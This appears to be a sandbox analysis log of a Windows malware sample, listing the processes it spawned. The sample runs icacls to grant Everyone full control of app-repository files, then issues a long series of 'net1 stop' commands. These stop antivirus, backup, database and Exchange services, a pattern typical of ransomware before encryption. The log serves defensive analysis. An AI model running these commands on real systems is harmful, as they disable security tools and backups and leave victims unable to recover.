  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:17076
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:17040
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10476
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:17276
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:17264
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13736
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:13576
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:10224
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14692
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:17308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13424
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9108
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:6764
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9856
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13444
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:16988
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:8156
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6336
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:10176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:7904
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9356
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6696
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:14572
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7404
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:14564
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5484
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:14608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9724
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:7184
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:8980
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9360
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:11632
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9084
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9688
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12848
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:12792
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5452
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6940
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5488
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:5412
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:7676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9748
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9028
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:9788
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5784
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9316
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:7460
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:17340
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9732
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:3896
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:8120
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9464
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:8412
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9116
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:8900

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:12672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:13744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:14028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:13752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:12380

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:12372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:12356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:12340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:12332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:12324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:12316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:12004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:12012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
1⤵
PID:11652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:14308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:14300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:14292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:14276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:14268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:14260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:14252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:14236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:14204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:14196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:14188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:14180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:14172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:14164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:14156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:14148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:14036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:11032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:10172

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:8596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:14520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:15056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:15700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:15692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:14912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:14904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:14896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:14888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:14880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:14872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:14864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:14856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:14848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:14840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:14832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:14824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:14816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:14808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:14800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:14792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:14784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:14776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:14760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:14752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:14744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:14728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:14720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:14712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:14704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:14696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:14688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:14680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:14672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:14664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:14656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:14648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:14640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:14632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:14624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:14616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:14608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:14600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
